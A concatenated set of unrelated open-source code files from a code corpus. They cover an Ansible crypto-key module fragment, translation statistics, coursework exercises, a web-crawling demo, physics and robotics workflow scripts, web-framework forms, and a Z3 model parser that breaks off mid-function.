'secp256r1', 'secp384r1', 'secp521r1', 'secp192r1', 'brainpoolP256r1', 'brainpoolP384r1', 'brainpoolP512r1', 'sect163k1', 'sect163r2', 'sect233k1', 'sect233r1', 'sect283k1', 'sect283r1', 'sect409k1', 'sect409r1', 'sect571k1', 'sect571r1', ]), passphrase=dict(type='str', no_log=True), cipher=dict(type='str'), format=dict(type='str', default='auto_ignore', choices=['pkcs1', 'pkcs8', 'raw', 'auto', 'auto_ignore']), format_mismatch=dict(type='str', default='regenerate', choices=['regenerate', 'convert']), select_crypto_backend=dict(type='str', choices=['auto', 'pyopenssl', 'cryptography'], default='auto'), regenerate=dict( type='str', default='full_idempotence', choices=['never', 'fail', 'partial_idempotence', 'full_idempotence', 'always'] ), ), required_together=[ ['cipher', 'passphrase'] ], required_if=[ ['type', 'ECC', ['curve']], ], )
1.164063
1
vendor/packages/translate-toolkit/translate/storage/statistics.py
DESHRAJ/fjord
0
12761387
#!/usr/bin/env python # -*- coding: utf-8 -*- # # Copyright 2007 Zuza Software Foundation # # This file is part of translate. # # translate is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # translate is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, see <http://www.gnu.org/licenses/>. """Module to provide statistics and related functionality. """ from translate import lang from translate.lang import factory # calling classifyunits() in the constructor is probably not ideal. # idea: have a property for .classification that calls it if necessary # If we add units or change translations, statistics are out of date # Compare with modules/Status.py in pootling that uses a bitmask to # filter units # Add support for reading and writing Pootle style .stats files # Consider providing quickstats class Statistics(object): """Manages statistics for storage objects.""" def __init__(self, sourcelanguage='en', targetlanguage='en', checkerstyle=None): self.sourcelanguage = sourcelanguage self.targetlanguage = targetlanguage self.language = lang.factory.getlanguage(self.sourcelanguage) # self.init_checker(checkerstyle) self.classification = {} def init_checker(self, checkerstyle=None): from translate.filters import checks from translate.filters import pofilter checkerclasses = [checkerstyle or checks.StandardChecker, pofilter.StandardPOChecker] self.checker = pofilter.POTeeChecker(checkerclasses=checkerclasses) def fuzzy_units(self): """Return a list of fuzzy units.""" if not self.classification: self.classifyunits() units = self.getunits() return [units[item] for item in self.classification["fuzzy"]] def fuzzy_unitcount(self): """Returns the number of fuzzy units.""" return len(self.fuzzy_units()) def translated_units(self): """Return a list of translated units.""" if not self.classification: self.classifyunits() units = self.getunits() return [units[item] for item in self.classification["translated"]] def translated_unitcount(self): """Returns the number of translated units.""" return len(self.translated_units()) def untranslated_units(self): """Return a list of untranslated units.""" if not self.classification: self.classifyunits() units = self.getunits() return [units[item] for item in self.classification["blank"]] def untranslated_unitcount(self): """Returns the number of untranslated units.""" return len(self.untranslated_units()) def getunits(self): """Returns a list of all units in this object.""" return [] def get_source_text(self, units): """Joins the unit source strings in a single string of text.""" source_text = "" for unit in units: source_text += unit.source + "\n" plurals = getattr(unit.source, "strings", []) if plurals: source_text += "\n".join(plurals[1:]) return source_text def wordcount(self, text): """Returns the number of words in the given text.""" return len(self.language.words(text)) def source_wordcount(self): """Returns the number of words in the source text.""" source_text = self.get_source_text(self.getunits()) return self.wordcount(source_text) def translated_wordcount(self): """Returns the number of translated words in this object.""" text = self.get_source_text(self.translated_units()) return self.wordcount(text) def untranslated_wordcount(self): """Returns the number of untranslated words in this object.""" text = self.get_source_text(self.untranslated_units()) return self.wordcount(text) def classifyunit(self, unit): """Returns a list of the classes that the unit belongs to. :param unit: the unit to classify """ classes = ["total"] if unit.isfuzzy(): classes.append("fuzzy") if unit.gettargetlen() == 0: classes.append("blank") if unit.istranslated(): classes.append("translated") #TODO: we don't handle checking plurals at all yet, as this is tricky... source = unit.source target = unit.target if isinstance(source, str) and isinstance(target, unicode): source = source.decode(getattr(unit, "encoding", "utf-8")) #TODO: decoding should not be done here # checkresult = self.checker.run_filters(unit, source, target) checkresult = {} for checkname, checkmessage in checkresult.iteritems(): classes.append("check-" + checkname) return classes def classifyunits(self): """Makes a dictionary of which units fall into which classifications. This method iterates over all units. """ self.classification = {} self.classification["fuzzy"] = [] self.classification["blank"] = [] self.classification["translated"] = [] self.classification["has-suggestion"] = [] self.classification["total"] = [] # for checkname in self.checker.getfilters().keys(): # self.classification["check-" + checkname] = [] for item, unit in enumerate(self.unit_iter()): classes = self.classifyunit(unit) # if self.basefile.getsuggestions(item): # classes.append("has-suggestion") for classname in classes: if classname in self.classification: self.classification[classname].append(item) else: self.classification[classname] = item self.countwords() def countwords(self): """Counts the source and target words in each of the units.""" self.sourcewordcounts = [] self.targetwordcounts = [] for unit in self.unit_iter(): self.sourcewordcounts.append([self.wordcount(text) for text in getattr(unit.source, "strings", [""])]) self.targetwordcounts.append([self.wordcount(text) for text in getattr(unit.target, "strings", [""])]) def reclassifyunit(self, item): """Updates the classification of a unit in self.classification. :param item: an integer that is an index in .getunits(). """ unit = self.getunits()[item] self.sourcewordcounts[item] = [self.wordcount(text) for text in unit.source.strings] self.targetwordcounts[item] = [self.wordcount(text) for text in unit.target.strings] classes = self.classifyunit(unit) # if self.basefile.getsuggestions(item): # classes.append("has-suggestion") for classname, matchingitems in self.classification.items(): if (classname in classes) != (item in matchingitems): if classname in classes: self.classification[classname].append(item) else: self.classification[classname].remove(item) self.classification[classname].sort() # self.savestats()
1.789063
2
PSet3/MIT_6.00.1x_PSet3_P2_Andrey_Tymofeiuk.py
atymofeiuk/MIT_6.00.1x_Andrey_Tymofeiuk
0
12761515
<gh_stars>0 # -*- coding: utf-8 -*- """ Created on Thu Jun 15 13:58:31 2017 MIT 6.00.1x course on edX.org: PSet3 P2 Next, implement the function getGuessedWord that takes in two parameters - a string, secretWord, and a list of letters, lettersGuessed. This function returns a string that is comprised of letters and underscores, based on what letters in lettersGuessed are in secretWord. This shouldn't be too different from isWordGuessed! @author: <NAME> Important: This code is placed at GitHub to track my progress in programming and to show my way of thinking. Also I will be happy if somebody will find my solution interesting. But I respect The Honor Code and I ask you to respect it also - please don't use this solution to pass the MIT 6.00.1x course. """ def getGuessedWord(secretWord, lettersGuessed): ''' secretWord: string, the word the user is guessing lettersGuessed: list, what letters have been guessed so far returns: string, comprised of letters and underscores that represents what letters in secretWord have been guessed so far. ''' guess = "" for letter in secretWord: if letter in lettersGuessed: guess += letter else: guess += " _" return guess
2.828125
3
gen_colors.py
kewitz/master
3
12761643
<gh_stars>1-10 # -*- coding: utf-8 -*- """ The MIT License (MIT) Copyright (c) 2014 <NAME> Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ import NScheme as ns files = ["./res/L10.msh"] #files = ["./res/L2.msh"] def validateColors(colors): v = True for color in colors: for nodes in color: elements = [e for n in nodes for e in n.elements] cv = len(elements) == len(set(elements)) v = v and cv if not cv: break assert v, "Existem nós com elementos em comum em uma mesma cor." bound = {2: 100.0, 5: 0.0} for f in files: m = ns.Mesh(file=f, verbose=True, debug=True) limit = ns.lib.alloc(len(m.nodes)) colors = m.makeColors(limit, bound, 1) validateColors(colors) dof = len([n for n in m.nodes if n.calc]) nodes_mapped = sum([len(c) for g in colors for c in g]) assert dof == nodes_mapped, "Faltando nós. {} < {}".format(nodes_mapped, dof) print "Done."
1.984375
2
topological_nav/tools/eval_traj_following.py
KH-Kyle/rmp_nav
30
12761771
<reponame>KH-Kyle/rmp_nav import numpy as np import gflags import sys import glob from easydict import EasyDict import os from rmp_nav.neural.common.dataset import DatasetVisualGibson from rmp_nav.common.utils import get_project_root, get_data_dir, get_gibson_asset_dir, get_config_dir from rmp_nav.simulation import agent_factory from topological_nav.reachability import model_factory from topological_nav.tools import eval_envs from topological_nav.tools.eval_traj_following_common import EvaluatorReachability gflags.DEFINE_string('env', 'space8', '') gflags.DEFINE_string('model', 'model_12env_v2_future_pair_proximity_z0228', '') gflags.DEFINE_boolean('dry_run', False, '') gflags.DEFINE_float('sparsify_thres', 0.99, '') gflags.DEFINE_integer('start_idx', 0, '') gflags.DEFINE_integer('n_traj', 100, '') gflags.DEFINE_float('clip_velocity', 0.5, 'Limit the max velocity.') gflags.DEFINE_boolean('visualize', True, '') gflags.DEFINE_boolean('save_screenshot', False, '') gflags.DEFINE_float('zoom', 1.0, '') FLAGS = gflags.FLAGS FLAGS(sys.argv) model = model_factory.get(FLAGS.model)() sparsifier = model['sparsifier'] motion_policy = model['motion_policy'] traj_follower = model['follower'] agent = agent_factory.agents_dict[model['agent']]() e = EvaluatorReachability(dataset=eval_envs.make(FLAGS.env, sparsifier), sparsifier=sparsifier, motion_policy=motion_policy, follower=traj_follower, agent=agent, agent_reverse=None, sparsify_thres=FLAGS.sparsify_thres, clip_velocity=FLAGS.clip_velocity, visualize=FLAGS.visualize, save_screenshot=FLAGS.save_screenshot, zoom=FLAGS.zoom, dry_run=FLAGS.dry_run) e.run(start_idx=FLAGS.start_idx, n_traj=FLAGS.n_traj)
1.515625
2
NNEvol/get_best_nn.py
cvazquezlos/NNEvol-python
1
12761899
<reponame>cvazquezlos/NNEvol-python def get_best_nn(): return(None)
0.478516
0
com/wy/example/E_Clawer01.py
mygodness100/Python
0
12762027
# 利用gevent进行爬虫,python3.8没有匹配的gevent,需要等待 from urllib import request # 使用gevent爬虫,自动,gevent需要安装 import gevent, time from gevent import monkey from http.cookiejar import CookieJar from bs4 import BeautifulSoup monkey.patch_all() # 把当前程序的所有的io操作给我单独的做上标记,必须要加,因为gevent不能urllib中的io操作 def f(url): resp = request.urlopen(url) # 打开一个网页 data = resp.read() # 读取网页中所有的内容 print('%d bytes received from %s.' % (len(data), url)) urls = ['https://www.python.org/', 'https://www.yahoo.com/', 'https://github.com/' ] time_start = time.time() for url in urls: # 同步进行爬虫操作 f(url) print("同步cost", time.time() - time_start) async_time_start = time.time() gevent.joinall([gevent.spawn(f, urls[0]), gevent.spawn(f, urls[1]), gevent.spawn(f, urls[2]), ]) # 异步进行爬虫操作 print("异步cost", time.time() - async_time_start) request.urlretrieve("http地址", "存储到本地的完整地址") # 将文件直接下载到本地 # 爬虫的一种方法,不直接用request,而是伪造一个Request请求,加上一些请求头等 fake1 = request.Request("url") fake1.add_header("user_agent", "Mozilla/5.0") # 添加浏览器类型 resp1 = request.urlopen(fake1) print(resp1.read()) # 爬虫的另外一种方法,添加特殊处理方式 # 1.需要添加cookie的:HTTPCookieProcessor # 2.需要代理才能访问的:ProxyHandler # 3.需要https加密访问的:HTTPSHandler # 4.有自动跳转的:HTTPRedirectHandler # specialHandler = request.build_opener(HTTPSHandler()) # request.install_opener(specialHandler) # request.urlopen("url") cookie = CookieJar() fake2 = request.build_opener(request.HTTPCookieProcessor(cookie)) request.install_opener(fake2) resp2 = request.urlopen("url") print(resp2.read()) # BeautifulSoup:解析html页面,需要安装beautifulsoup4,还需要安装lxml soup= BeautifulSoup("html字符串","html.parser:指定解析器,html就是html.parser","from_encoding=utf8")
1.71875
2
repo/script.module.liveresolver/lib/js2py/pyjs.py
Hades01/Addons
3
12762155
from base import * from constructors.jsmath import Math from constructors.jsdate import Date from constructors.jsobject import Object from constructors.jsfunction import Function from constructors.jsstring import String from constructors.jsnumber import Number from constructors.jsboolean import Boolean from constructors.jsregexp import RegExp from constructors.jsarray import Array from prototypes.jsjson import JSON from host.console import console from host.jseval import Eval from host.jsfunctions import parseFloat, parseInt, isFinite, isNaN # Now we have all the necessary items to create global environment for script __all__ = ['Js', 'PyJsComma', 'PyJsStrictEq', 'PyJsStrictNeq', 'PyJsException', 'PyJsBshift', 'Scope', 'PyExceptionToJs', 'JsToPyException', 'JS_BUILTINS', 'appengine', 'set_global_object', 'JsRegExp', 'PyJsException', 'PyExceptionToJs', 'JsToPyException', 'PyJsSwitchException'] # these were defined in base.py builtins = ('true','false','null','undefined','Infinity', 'NaN', 'console', 'String', 'Number', 'Boolean', 'RegExp', 'Math', 'Date', 'Object', 'Function', 'Array', 'parseFloat', 'parseInt', 'isFinite', 'isNaN') #Array, Function, JSON, Error is done later :) # also some built in functions like eval... def set_global_object(obj): obj.IS_CHILD_SCOPE = False this = This({}) this.own = obj.own this.prototype = obj.prototype PyJs.GlobalObject = this # make this available obj.register('this') obj.put('this', this) scope = dict(zip(builtins, [globals()[e] for e in builtins])) # Now add errors: for name, error in ERRORS.iteritems(): scope[name] = error #add eval scope['eval'] = Eval scope['JSON'] = JSON JS_BUILTINS = {} #k:v for k,v in scope.iteritems() for k,v in scope.iteritems(): JS_BUILTINS[k] = v
1.351563
1
nl2type/nl2type.py
rs-malik/nl2type
1
12762283
import argparse import json from gensim.models import Word2Vec from tensorflow_core.python.keras.models import load_model import convert import extract import predict import vectorize from annotation import annotate def main(input_file: str, output_file: str): extracted_jsdoc = extract.extract_from_file(input_file) df = convert.convert_func_to_df(extracted_jsdoc) word2vec_code = Word2Vec.load('data/word_vecs/word2vec_model_code.bin') word2vec_lang = Word2Vec.load('data/word_vecs/word2vec_model_language.bin') vectors = vectorize.df_to_vec(df, word2vec_lang, word2vec_code) model = load_model('data/model.h5') with open("data/types.json") as f: types_map = json.load(f) predictions = predict.predict(model, vectors, types_map) annotate.annotate(df, predictions, input_file, output_file) if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument("input_file_path", type=str, help="Path of the input file") parser.add_argument("output_file_path", type=str, help="Path of the output file") args = parser.parse_args() main(args.input_file_path, args.output_file_path)
1.773438
2
workflows/rdx.py
umd-lhcb/lhcb-ntuples-gen
0
12762411
#!/usr/bin/env python3 # # Author: <NAME> # License: BSD 2-clause # Last Change: Mon Oct 25, 2021 at 09:41 PM +0200 import sys import os import os.path as op from argparse import ArgumentParser, Action from os import chdir from shutil import rmtree from pyBabyMaker.base import TermColor as TC sys.path.insert(0, op.dirname(op.abspath(__file__))) from utils import ( run_cmd_wrapper, append_path, abs_path, ensure_dir, find_all_input, aggregate_fltr, aggregate_output, load_yaml_db, find_year, find_polarity, generate_step2_name, parse_step2_name, workflow_compile_cpp, workflow_cached_ntuple ) ################################# # Command line arguments parser # ################################# def parse_input(): parser = ArgumentParser(description='workflow for R(D(*)).') parser.add_argument('job_name', help='specify job name.') parser.add_argument('-d', '--debug', action='store_true', help='enable debug mode.') return parser.parse_args() ########### # Helpers # ########### rdx_default_fltr = aggregate_fltr( keep=[r'^(Dst|D0).*\.root'], blocked=['__aux']) rdx_default_output_fltrs = { 'ntuple': rdx_default_fltr, 'ntuple_aux': aggregate_fltr(keep=['__aux']), } def rdx_mc_fltr(decay_mode): db = load_yaml_db() # Unfortunately we need to use 'Filename' as the key so we need to re-build # the dict on the fly db = {v['Filename']: v['Keep'] for v in db.values() if 'Keep' in v} if decay_mode not in db: return rdx_default_fltr return aggregate_fltr(keep=[r'^({}).*\.root'.format( '|'.join(db[decay_mode]))]) def rdx_mc_add_info(decay_mode): known_trees = ['D0', 'Dst'] tree_dict = { 'D0': 'TupleBminus/DecayTree', 'Dst': 'TupleB0/DecayTree' } raw_db = load_yaml_db() # Unfortunately we need to use 'Filename' as the key so we need to re-build # the dict on the fly db_keep = {v['Filename']: v['Keep'] for v in raw_db.values() if 'Keep' in v} db_id = {v['Filename']: k for k, v in raw_db.items()} try: decay_id = db_id[decay_mode] except KeyError: decay_id = '0' if decay_mode not in db_keep: return None, decay_id # NOTE: Here we are returning trees to BLOCK!! return [tree_dict[t] for t in known_trees if t not in db_keep[decay_mode]], decay_id ###################### # Workflows: helpers # ###################### def workflow_ubdt(input_ntp, trees=['TupleB0/DecayTree', 'TupleBminus/DecayTree'], **kwargs): weight_file = abs_path('../run2-rdx/weights_run2_no_cut_ubdt.xml') cmd = 'addUBDTBranch {} mu_isMuonTight {} ubdt.root {}'.format( input_ntp, weight_file, ' '.join(trees)) workflow_cached_ntuple(cmd, input_ntp, **kwargs) try: rmtree('./weights') except FileNotFoundError: pass def workflow_hammer(input_ntp, trees=['TupleB0/DecayTree', 'TupleBminus/DecayTree'], **kwargs): run = 'run1' if '2011' in input_ntp or '2012' in input_ntp else 'run2' cmd = ['ReweightRDX '+input_ntp+' hammer.root '+t+' '+run for t in trees] workflow_cached_ntuple( cmd, input_ntp, output_ntp='hammer.root', cache_suffix='__aux_hammer', **kwargs) def workflow_pid(input_ntp, pid_histo_folder, config, **kwargs): pid_histo_folder = abs_path(pid_histo_folder) config = abs_path(config) year = find_year(input_ntp) polarity = find_polarity(input_ntp) # This is in 'scripts' folder! cmd = 'apply_histo_weight.py {} {} pid.root -c {} --year {} --polarity {}'.format( input_ntp, pid_histo_folder, config, year, polarity) workflow_cached_ntuple( cmd, input_ntp, output_ntp='pid.root', cache_suffix='__aux_pid', **kwargs) def workflow_data_mc(job_name, inputs, output_dir=abs_path('../gen'), patterns=['*.root'], blocked_patterns=['__aux'], executor=run_cmd_wrapper() ): print('{}==== Job: {} ===={}'.format(TC.BOLD+TC.GREEN, job_name, TC.END)) # Need to figure out the absolute path input_files = find_all_input(inputs, patterns, blocked_patterns) subworkdirs = {op.splitext(op.basename(i))[0]: i for i in input_files} # Now ensure the working dir workdir = ensure_dir(op.join(output_dir, job_name)) return subworkdirs, workdir, executor ############# # Workflows # ############# def workflow_data(job_name, inputs, input_yml, use_ubdt=True, output_ntp_name_gen=generate_step2_name, output_fltr=rdx_default_output_fltrs, cli_vars=None, blocked_input_trees=None, blocked_output_trees=None, directive_override=None, **kwargs): subworkdirs, workdir, executor = workflow_data_mc( job_name, inputs, **kwargs) chdir(workdir) cpp_template = abs_path('../postprocess/cpp_templates/rdx.cpp') if cli_vars: cli_vars = ' '.join([k+':'+v for k, v in cli_vars.items()]) for subdir, input_ntp in subworkdirs.items(): print('{}Working on {}...{}'.format(TC.GREEN, input_ntp, TC.END)) ensure_dir(subdir, make_absolute=False) chdir(subdir) # Switch to the workdir of the subjob if use_ubdt: # Generate a ubdt ntuple workflow_ubdt(input_ntp, executor=executor) bm_cmd = 'babymaker -i {} -o baby.cpp -n {} -t {} -f ubdt.root' else: bm_cmd = 'babymaker -i {} -o baby.cpp -n {} -t {}' if cli_vars: bm_cmd += ' -V '+cli_vars if blocked_input_trees: bm_cmd += ' -B '+' '.join(blocked_input_trees) if blocked_output_trees: bm_cmd += ' -X '+' '.join(blocked_output_trees) if directive_override: bm_cmd += ' -D '+' '.join([k+':'+v for k, v in directive_override.items()]) executor(bm_cmd.format(abs_path(input_yml), input_ntp, cpp_template)) workflow_compile_cpp('baby.cpp', executor=executor) output_suffix = output_ntp_name_gen(input_ntp) executor('./baby.exe --{}'.format(output_suffix)) aggregate_output('..', subdir, output_fltr) chdir('..') # Switch back to parent workdir def workflow_mc(job_name, inputs, input_yml, output_ntp_name_gen=generate_step2_name, pid_histo_folder='../run2-rdx/reweight/pid/root-run2-rdx_oldcut', config='../run2-rdx/reweight/pid/run2-rdx_oldcut.yml', output_fltr=rdx_default_output_fltrs, **kwargs): subworkdirs, workdir, executor = workflow_data_mc( job_name, inputs, **kwargs) chdir(workdir) cpp_template = abs_path('../postprocess/cpp_templates/rdx.cpp') for subdir, input_ntp in subworkdirs.items(): print('{}Working on {}...{}'.format(TC.GREEN, input_ntp, TC.END)) ensure_dir(subdir, make_absolute=False) chdir(subdir) # Switch to the workdir of the subjob output_suffix = output_ntp_name_gen(input_ntp) decay_mode = output_suffix.split('--')[2] blocked_input_trees, decay_id = rdx_mc_add_info(decay_mode) # Generate a HAMMER ntuple workflow_hammer(input_ntp, executor=executor) # Generate PID weights workflow_pid(input_ntp, pid_histo_folder, config, executor=executor) bm_cmd = 'babymaker -i {} -o baby.cpp -n {} -t {} -f hammer.root pid.root' if blocked_input_trees: bm_cmd += ' -B '+' '.join(blocked_input_trees) bm_cmd += ' -V '+'cli_mc_id:'+decay_id executor(bm_cmd.format(abs_path(input_yml), input_ntp, cpp_template)) workflow_compile_cpp('baby.cpp', executor=executor) executor('./baby.exe --{}'.format(output_suffix)) aggregate_output('..', subdir, output_fltr) chdir('..') # Switch back to parent workdir ##################### # Production config # ##################### args = parse_input() executor = run_cmd_wrapper(args.debug) JOBS = { # Run 2 'rdx-ntuple-run2-data-oldcut': lambda name: workflow_data( name, '../ntuples/0.9.5-bugfix/Dst_D0-cutflow_data', '../postprocess/rdx-run2/rdx-run2_oldcut.yml', executor=executor ), 'rdx-ntuple-run2-mc-demo': lambda name: workflow_mc( name, '../ntuples/0.9.5-bugfix/Dst_D0-mc/Dst_D0--21_10_08--mc--MC_2016_Beam6500GeV-2016-MagDown-Nu1.6-25ns-Pythia8_Sim09j_Trig0x6139160F_Reco16_Turbo03a_Filtered_11574011_D0TAUNU.SAFESTRIPTRIG.DST.root', '../postprocess/rdx-run2/rdx-run2_oldcut.yml', executor=executor ), # Run 2 debug 'rdx-ntuple-run2-data-oldcut-no-Dst-veto': lambda name: workflow_data( name, [ '../ntuples/0.9.4-trigger_emulation/Dst_D0-std', '../ntuples/0.9.5-bugfix/Dst_D0-cutflow_data', ], '../postprocess/rdx-run2/rdx-run2_oldcut.yml', executor=executor, cli_vars={'cli_no_dst_veto': '100.0'} ), # Run 2 cutflow 'rdx-ntuple-run2-data-oldcut-cutflow': lambda name: workflow_data( name, '../ntuples/0.9.5-bugfix/Dst_D0-cutflow_data', '../postprocess/rdx-run2/rdx-run2_oldcut.yml', executor=executor, cli_vars={'cli_cutflow': 'true'} ), # Run 1 'rdx-ntuple-run1-data': lambda name: workflow_data( name, '../ntuples/0.9.5-bugfix/Dst_D0-std', '../postprocess/rdx-run1/rdx-run1.yml', use_ubdt=False, executor=executor ), # Reference Run 1 'ref-rdx-ntuple-run1-data-Dst': lambda name: workflow_data( name, '../ntuples/ref-rdx-run1/Dst-mix/Dst--21_10_21--mix--all--2011-2012--md-mu--phoebe.root', '../postprocess/ref-rdx-run1/ref-rdx-run1-Dst.yml', use_ubdt=False, output_ntp_name_gen=parse_step2_name, executor=executor, directive_override={'one_cand_only/enable': 'false'} ), 'ref-rdx-ntuple-run1-data-D0': lambda name: workflow_data( name, '../ntuples/ref-rdx-run1/D0-mix/D0--21_10_21--mix--all--2011-2012--md-mu--phoebe.root', '../postprocess/ref-rdx-run1/ref-rdx-run1-D0.yml', use_ubdt=False, output_ntp_name_gen=parse_step2_name, executor=executor, directive_override={'one_cand_only/enable': 'false'} ), } if args.job_name in JOBS: JOBS[args.job_name](args.job_name) else: print('Unknown job name: {}'.format(args.job_name))
1.375
1
app/main/forms.py
CheboiDerrick/flask-blog-app
0
12762539
<gh_stars>0 from flask_wtf import FlaskForm from wtforms import StringField, SelectField, TextAreaField, SubmitField from wtforms.validators import Required class UpdateProfile(FlaskForm): bio = TextAreaField('Tell us a little about your awesome self.',validators = [Required()]) submit = SubmitField('Update') class BlogForm(FlaskForm): title = StringField('Title', validators=[Required()]) category = SelectField('Category', choices=[('Design','Design'),('Entertainment','Entertainment'),('Fashion & Style','Fashion & Style'),('Photography','Photograpgy'),('Business','Business')],validators=[Required()]) post = TextAreaField('Blog', validators=[Required()]) submit = SubmitField('Post') class CommentForm(FlaskForm): comment = TextAreaField('Leave a comment',validators=[Required()]) submit = SubmitField('Add Comment')
1.53125
2
cookbook/migrations/0018_auto_20200216_2303.py
mhoellmann/recipes
0
12762667
<reponame>mhoellmann/recipes # Generated by Django 3.0.2 on 2020-02-16 22:03 from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('cookbook', '0017_auto_20200216_2257'), ] operations = [ migrations.RenameModel( old_name='RecipeIngredients', new_name='RecipeIngredient', ), ]
0.59375
1
praeteritum/utils/Delegator.py
NoMariusz/Praeteritum
3
12762795
<reponame>NoMariusz/Praeteritum class Delegator(): """ Class implementing Delegator pattern in childrens, who enable to automaticaly use functions and methods from _delegate_subsystems, so reduces boilerplate code !!! be aware that Delegator can't delegate methods from childrens which implements Delegator """ def __init__(self): # prepare list of instances to delegate work to them if not self._delegate_subsystems: self._delegate_subsystems: list[object] = [] # prepare dict with subsystems and their methods self._subsystems_dicts = [ { "subsystem": s, "methods": [ f for f in dir(s) if not f.startswith('_') ] } for s in self._delegate_subsystems ] def __getattr__(self, func): """ Enable to delegate all methods from subsystems to self """ def method(*args): # get list of subsystems with specified method results = list(filter( lambda subsystem_data: func in subsystem_data["methods"], self._subsystems_dicts)) # if some results, return that function to execute if len(results) > 0: return getattr(results[0]["subsystem"], func)(*args) else: # raise error if not found raise AttributeError return method
2.65625
3
utility.py
syaoming/molle
0
12762923
from z3 import * from operator import or_ from pprint import pprint def _sorted_inters(inter_list, sp): ''' Sorts the inter_list = [('from', 'to', 'positive'), ...] into a dict, where keyvalue is a couple of number tuples, wich integer codes as keys. e.g. {1: ( (2, 3), (5, 9) )} : species 1 is activated by 2 and 3, and repressed by 5 and 9. ''' d = dict([(c, ([], [])) for c in range(len(sp))]) # initialization for i in inter_list: f, t = i[:2] if 'negative' in i: idx = 1 elif 'positive' in i: idx = 0 else: print 'no +/- assigend to interactions %d'%(inter_list) raise(Error) tcode, fcode = sp.index(t), sp.index(f) d.setdefault(tcode, ([], []))[idx].append(fcode) return d def readModel(f, opmt = True): ''' Take a file Object as input, return a tuple of 6 objects: species: a tuple of gene name. logics : a dict. { gene_name: list_of_allowed_logic_numbers } kofe : a dict. { "FE": list_of_FEable_gene, "KO": list_of_KOable_gene } defI : a dict of defined interations. Processed by _sorted_inters() optI : a dict of optional interactions. ''' species = [] logics = {} kofe = {'KO':[], 'FE':[]} def_inters_list = [] opt_inters_list = [] # read the components line for c in f.readline().strip().split(','): # get the gene name and +- mark if '(' in c : gene_ = c[:c.index('(')].strip() else: gene_ = c.strip() gene = filter(lambda x: not x in '+-', gene_) mark = filter(lambda x: x in '+-', gene_) # add to kofe if the gene has mark if('+' in mark): kofe['FE'].append(gene) if('-' in mark): kofe['KO'].append(gene) # record the allowed logics; if no, set to range(18) if '(' in c: left, right = c.index('('), c.index(')') rules = tuple( int(i) for i in c[left+1:right].split() ) else: rules = tuple(range(18)) logics[gene] = rules species.append(gene) # read the interaction lines total_opt = total_def = 0 for line in f.readlines(): l = line.strip().split() if(not l): continue # skip empty line if 'optional' in l: opt_inters_list.append(tuple(l[:3])) total_opt += 1 else: def_inters_list.append(tuple(l[:3])) total_def += 1 defI = _sorted_inters(def_inters_list, species) optI = _sorted_inters(opt_inters_list, species) return (species, logics, kofe, defI, optI) # kept from old version def _addExp(d, name, time_point, state_names_list): d.setdefault(name, []).append( (int(time_point), state_names_list) ) # kept from old version def _addState(d, state_name, gene, value): d.setdefault(state_name, []).append( (gene, int(value)) ) # kept from old version def readExp(f): ''' Take the file for experiment constrains, return two dicts: exps: the Experimental constrains for every experiment states: records the mapping of shortcut name to node states ''' exps = dict() states = dict() shortcut = '' for l in f.readlines(): l = l.strip(); if(not l): continue; # skip empty line try: l = l[:l.index('"')] # remove commment except ValueError: None try: l = l[:l.index(';')] # remove ; except ValueError: None if(shortcut): # inside the braket { } if(l[0] == '{'): continue # skip left bracket elif(l[0] == '}'): shortcut = '' # exit the braket; else: (left, right) = l.split('='); name = left.strip(); value = right.split()[0]; _addState(states, shortcut, name, value); # record configuration l = l.split(); if(l[0] == "//"): continue # comment line elif(l[0] == "under"): _addExp(exps, l[1], l[3], l[4:]) # recordexp elif(l[0] == "let"): shortcut = l[1]; # ready to enter the braket try: shortcut = shortcut[:shortcut.index(':')] except ValueError: None return (exps, states); def compati(l, actn, repn): ''' Speed up the solving. Not sure with the validicity when actn == 0 of such approach. ''' if len(l) < 16: return l if actn == 0: if repn == 0: return (-1, ) else: # only repressors return filter(lambda x: x > 15, l) or (-1, ) elif repn == 0: # only activator return filter(lambda x: x < 2, l) or (-1, ) else: return l zero = BitVecVal(0, 1) def Any(bvs): return reduce(or_, bvs, zero) def _concat(bvs): if len(bvs) == 1: return bvs[0] else: return Concat(bvs) def _create_bit_rule(num, act_list, rep_list, A, R): ''' Create the update rule that return bit-vector of length 1. ''' if num == -1: return BoolVal(False) # special case # initialization if act_list: act = _concat(act_list) else: act = A = zero if rep_list: rep = _concat(rep_list) else: rep = R = zero # creating result if num == 0: return And(R == 0, A != 0, A & act == A) elif num == 1: return And(R == 0, A & act != 0) #return And(R == 0, A != 0, A & act != 0) elif num == 2: return Or( And(R == 0, A != 0, A & act == A), And(R != 0, rep & R == 0, A & act != 0) ) #return Or( And(R == 0, A != 0, A & act == A), # And(R != 0, A != 0, rep & R == 0, A & act != 0) ) elif num == 3: return And(A & act != 0, rep & R == 0) elif num == 4: return And( A != 0, A & act == A, Or(R == 0, rep & R != R) ) #return Or( And(R == 0, A != 0, A & act == A), # And(A != 0, A & act == A, rep & R != R) ) #return Or( And(R == 0, A != 0, A & act == A), # And(R != 0, A != 0, A & act == A, rep & R != R) ) elif num == 5: return Or( And(R == 0, act & A != 0), And(A != 0, act & A == A, rep & R != R) ) #return Or( And(R == 0, A != 0, act & A != 0), # And(R != 0, A != 0, act & A == A, rep & R != R) ) elif num == 